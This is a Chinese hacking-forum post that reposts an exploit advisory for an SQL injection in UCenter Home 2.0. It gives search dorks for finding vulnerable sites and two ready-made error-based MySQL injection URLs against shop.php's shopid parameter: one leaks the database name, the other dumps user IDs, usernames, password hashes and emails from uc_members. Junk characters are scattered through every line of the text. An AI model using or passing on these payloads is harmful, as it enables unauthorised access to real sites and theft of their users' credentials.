找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2136|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:31:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

+ B: K. P( C2 F6 t* U! v8 f' z__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  
* M- _+ U3 Y1 t; }2 }
8 h$ X# s3 ^* N2 t0 p                                   N5 q3 ?0 T2 l' L7 X
! [; R2 L7 n! S, M6 ~
*/ Author : KnocKout    @2 {$ N# H6 T% j1 ~

! b' {4 z4 j2 K. Y' I+ L4 V*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  : B/ d/ \' |9 {! Y- z& j. D% ?
' [( q( Z! U4 g6 P
*/ Contact: knockoutr@msn.com  + O' p. O) f( ^

' A' f9 R' h. a" {& A, u! J( T; [*/ Cyber-Warrior.org/CWKnocKout  
3 p5 Y2 V6 o7 ?" h. d
! @+ s* J9 b5 K7 x5 u# K__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
  U7 M) r+ Y! Y& @( y" d
: j) i0 W! q- F8 f1 sScript : UCenter Home  
5 Z0 @4 _+ ^6 p; g- D0 ~; D: W, U2 w+ f% ?5 G2 C
Version : 2.0  
& g; g' y& e* E! G$ V6 r  f/ \
3 h# F5 r5 h" y# Q" LScript HomePage : http://u.discuz.net/  # |. H* C% X& A$ C" p

  `8 l3 H& Y: W__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
$ K9 v& p! d$ o7 n; u! E& j3 u, \* I( @- I
Dork : Powered by UCenter inurl:shop.php?ac=view  
" @- ^) V4 j/ i+ q( l) v; i% f# h9 h& E& T1 E+ P
Dork 2 : inurl:shop.php?ac=view&shopid=  
  O& U/ O/ `' F8 b* j
2 X0 V- Y* x1 ^0 ^0 r__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
( Q6 ~& w# y' R6 S
. N  O8 X" p) e- |4 {6 RVuln file : Shop.php  
( W* D) V5 L1 d( G& R' x& W. y' V% _; ?. G
value's : (?)ac=view&shopid=  ; s3 R7 |5 R& N. F8 b: Q

& L' ^9 j3 ~4 E$ X. p) }9 DVulnerable Style : SQL Injection (MySQL Error Based)    t* ~8 I  o. |. K& E
# |5 o, ?" _& c! g$ o" R
Need Metarials : Hex Conversion  0 Z+ g4 O: x. h* [

* u9 D2 [( b) D  o__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  " `% H4 e& B8 M5 [7 T
  F/ Y8 N& `- G& w
Your Need victim Database name.   3 [8 B5 m% F: f: q
% Q: ^9 K7 ]0 p' b( Y- T0 T
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
' G- e5 r. S/ Q( e# U3 z8 R( o) p* g& ]; {
..  
2 S8 S, r  B5 ~5 e# A2 G7 ]
% P+ |5 g$ L& B- N3 M8 c7 {6 B1 R& MDB : Okey.  # x! `4 |; b5 O# I5 O
3 g) v3 M7 n: {1 [
your edit DB `[TARGET DB NAME]`  2 |+ r+ A% S: i. d! i- ^

8 P9 F. Y- R* x! k# gExample : 'hiwir1_ucenter'  
1 S6 y5 P6 g+ v* B0 Q/ ]  Y
" }" o- i- l9 I& z2 x) YEdit : Okey.  . W" Q! d  @) X9 J
/ e) L7 m2 j* n5 s
Your use Hex conversion. And edit Your SQL Injection Exploit..  , r: b1 r- j, C9 m. m$ N
/ w, e2 Y4 R6 d  e4 Z7 N) q
   4 {& o& w) ]& P$ s* _: E
7 b8 p- l* a- n: |- I
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
8 W5 a8 d  l# L
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表